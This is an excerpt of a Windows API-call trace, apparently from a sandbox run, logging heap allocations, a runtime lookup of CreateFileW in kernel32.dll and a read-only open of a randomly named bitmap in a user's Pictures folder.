RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.593] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.595] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0092.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caa48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0092.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.596] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0092.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0092.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0092.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7yKccLuS8OBSzjABi0L.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7ykcclus8obszjabi0l.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0092.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0092.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.597] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e4f0 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.598] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.598] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.599] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.599] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.601] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.601] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.601] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0092.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 